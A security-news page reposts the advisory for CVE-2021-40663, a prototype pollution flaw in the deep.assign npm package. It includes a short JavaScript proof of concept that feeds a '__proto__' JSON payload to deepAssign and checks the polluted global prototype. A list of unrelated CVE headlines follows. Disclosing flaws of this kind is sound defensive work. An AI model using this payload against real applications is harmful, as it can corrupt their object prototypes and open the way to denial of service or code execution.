Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2021-40663: Prototype Pollution in deep.assign npm package · Issue #1 · janbialostok/deep-assign

deep.assign npm package 0.0.0-alpha.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes (‘Prototype Pollution’).

CVE
Open in Source
#vulnerability#apple#nodejs#js#perl

✍️ Description
deep.assign npm package is vulnerable to prototype pollution vulnerability prior to version 0.0.0-alpha.0.

var deepAssign = require("[email protected]")
var obj=JSON.parse('{"__proto__":{"polluted":1}}')
var obj1 = {"red":"apple"}
console.log("Before:"+{}.polluted)
var c=deepAssign.deepAssign(obj1,obj)
console.log("After:"+{}.polluted)

💥 Impact
May lead to Information Disclosure/DoS/RCE.

Related news

GHSA-3829-mgmw-jcg4: Prototype Pollution in deep.assign

deep.assign npm package 0.0.0-alpha.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE